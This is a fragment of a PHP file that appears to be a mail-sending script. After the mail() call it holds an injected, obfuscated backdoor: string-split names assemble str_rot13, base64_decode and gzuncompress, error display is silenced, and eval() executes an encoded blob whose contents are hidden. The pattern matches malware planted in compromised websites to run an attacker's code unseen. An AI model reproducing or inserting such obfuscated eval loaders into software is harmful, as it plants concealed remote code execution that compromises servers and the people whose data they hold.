					mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 
	}	

}

?>